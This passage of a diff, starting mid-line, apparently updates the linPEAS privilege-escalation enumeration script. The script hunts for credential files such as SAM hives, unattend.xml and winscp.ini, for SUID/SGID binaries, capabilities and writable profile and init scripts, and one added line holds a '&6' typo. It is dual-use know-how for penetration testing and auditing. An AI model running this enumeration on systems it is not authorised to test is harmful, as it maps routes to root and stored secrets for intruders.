"$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security$\"`" ]; then echo_not_found "security"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security$" | while read f; do ls -ld "$f" | sed -${E} "s,security$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"services\.xml$\"`" ]; then echo_not_found "services.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "services\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,services\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then echo_not_found "software"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then echo_not_found "software.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then echo_not_found "sysprep.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then echo_not_found "sysprep.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then echo_not_found "system.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then echo_not_found "unattend.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Other Interesting Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then echo_not_found ".lesshst"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then echo_not_found ".plan"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then echo_not_found ".profile"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then echo_not_found ".recently-used.xbel"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then echo_not_found ".rhosts"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; + - #-- SI) SNMP params - printf $Y"[+] "$GREEN"SNMPs\n"$NC - snmpdfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'snmpd.conf') - printf "%s\n" "$snmpdfiles" | while read f; do - ls -l "$f" 2>/dev/null - cat "$f" 2>/dev/null | grep -E "rocommunity|rwcommunity" | sed -${E} "s,rocommunity|rwcommunity,${C}[1;31m&${C}[0m," - echo "" - done - echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi @@ -2788,11 +2713,11 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ########################################### #----------) Interesting files (----------# ########################################### - printf $B"════════════════════════════════════╣ "$GREEN"Interesting Files"$B" ╠════════════════════════════════════\n"$NC + print_title "Interesting Files" ##-- IF) SUID - printf $Y"[+] "$GREEN"SUID - Check easy privesc, exploits and write perms\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + print_2title "SUID - Check easy privesc, exploits and write perms" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" if ! [ "$STRINGS" ]; then echo_not_found "strings" fi @@ -2802,14 +2727,14 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then find / -perm -4000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if [ "`echo \"$s\" | grep -E \"^total\"`" ]; then break; fi - + sname="`echo \"$s\" | awk '{print $9}'`" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing - elif [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do @@ -2821,9 +2746,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then done; if [ "$c" ]; then if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then - echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG3,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG4,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$sidVB2,${C}[1;31;103m&${C}[0m," + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m," + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do @@ -2844,7 +2769,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then printf $ITALIC echo "----------------------------------------------------------------------------------------" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC echo "----------------------------------------------------------------------------------------" echo "" @@ -2858,8 +2783,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) SGID - printf $Y"[+] "$GREEN"SGID\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + print_2title "SGID" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" find / -perm -2000 -type f 2>/dev/null | xargs ls -lahtr | while read s; do #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if [ "`echo \"$s\" | grep -E \"^total\"`" ];then break; fi @@ -2867,10 +2792,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then sname="`echo \"$s\" | awk '{print $9}'`" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true #Don't do nothing - elif [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] &6 [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do @@ -2882,9 +2807,9 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then done; if [ "$c" ]; then if [ "`echo \"$s\" | grep -E \"$sidG1\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG2\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG3\"`" ] || [ "`echo \"$s\" | grep -E \"$sidG4\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB\"`" ] || [ "`echo \"$s\" | grep -E \"$sidVB2\"`" ]; then - echo "$s" | sed -${E} "s,$sidG1,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG2,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG3,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidG4,${C}[1;32m&${C}[0m," | sed -${E} "s,$sidVB,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$sidVB2,${C}[1;31;103m&${C}[0m," + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m," + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC if [ "$STRINGS" ]; then $STRINGS "$sname" | sort | uniq | while read sline; do @@ -2904,7 +2829,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then printf $ITALIC echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${C}[1;31m&${C}[0m$ITALIC,g" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC echo "" fi @@ -2916,196 +2841,196 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Misconfigured ld.so - printf $Y"[+] "$GREEN"Checking misconfigurations of ld.so\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so\n"$NC + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" cat /etc/ld.so.conf 2>/dev/null | while read l; do if [ "`echo \"$l\" | grep include`" ]; then ini_path="`echo \"$l\" | cut -d " " -f 2`" fpath="`dirname \"$ini_path\"`" - if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done fi done echo "" ##-- IF) Capabilities - printf $Y"[+] "$GREEN"Capabilities\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${C}[1;31;103m&${C}[0m," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$$/status" + (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" echo "Shell capabilities:" (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${C}[1;32m&${C}[0m,") 2>/dev/null || echo_not_found "/proc/$PPID/status" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" echo "Files with capabilities (limited to 50):" getcap -r / 2>/dev/null | head -n 50 | while read cb; do - echo "$cb" | sed -${E} "s,$sudocapsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m," - if [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + echo "$cb" | sed -${E} "s,$sudocapsB,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED}," + if ! [ "$IAMROOT" ] && [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," fi done echo "" ##-- IF) Users with capabilities - printf $Y"[+] "$GREEN"Users with capabilities\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities\n"$NC + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," else echo_not_found "/etc/security/capability.conf" fi echo "" ##-- IF) Files with ACLs - printf $Y"[+] "$GREEN"Files with ACLs (limited to 50)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls\n"$NC - ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," + print_2title "Files with ACLs (limited to 50)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" + ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," echo "" - + ##-- IF) .sh files in PATH - printf $Y"[+] "$GREEN".sh files in path\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path\n"$NC - echo $PATH | tr ":" "\n" | while read d; do + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" + echo $PATH | tr ":" "\n" | while read d; do for f in `find "$d" -name "*.sh" 2>/dev/null`; do - if [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - elif [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else - echo $f | sed -${E} "s,$shscripsG,${C}[1;32m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,"; + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; fi done done echo "" ##-- IF) Unexpected folders in / - printf $Y"[+] "$GREEN"Unexpected in root\n"$NC + print_2title "Unexpected in root" if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,") || echo_not_found + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found fi echo "" ##-- IF) Files (scripts) in /etc/profile.d/ - printf $Y"[+] "$GREEN"Files (scripts) in /etc/profile.d/\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files\n"$NC + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${C}[1;32m&${C}[0m,") || echo_not_found "/etc/profile.d/" - if [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi - if [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; fi + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" ##-- IF) Files (scripts) in /etc/init.d/ - printf $Y"[+] "$GREEN"Permissions in init, init.d, systemd, and rc.d\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d\n"$NC + print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} 